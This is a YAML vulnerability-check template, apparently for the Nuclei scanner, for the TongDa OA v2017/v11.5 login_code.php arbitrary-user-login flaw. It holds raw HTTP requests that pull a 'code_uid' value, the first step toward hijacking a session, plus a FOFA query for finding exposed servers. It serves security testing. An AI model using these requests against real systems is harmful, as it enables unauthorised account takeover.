id: TongDa-3

info:
  name: 通达OA v2017、v11.5 login_code.php 任意用户登录
  author: attempt
  severity: high
  description: |
    通达OA v2017、v11.5 通达OA存在任意用户登录漏洞，攻击者可以通过指定接口获取cookie，导致业务后台失陷。
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.5%20login_code.php%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95.html
    - https://www.freebuf.com/vuls/256508.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: TongDa,OA,任意用户登录
request:
  - raw:
      - |
        GET /general/login_code.php HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
      - |
        GET /ispirit/login_code.php HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
    matchers-condition: or    
    matchers:
      - type: regex
        part: body_0
        regex:
          - "\"code_uid\":\"(\\{[\\w-]+\\})\""
      - type: regex
        part: body_1
        regex:
          - "\"code_uid\":\"(\\{[\\w-]+\\})\""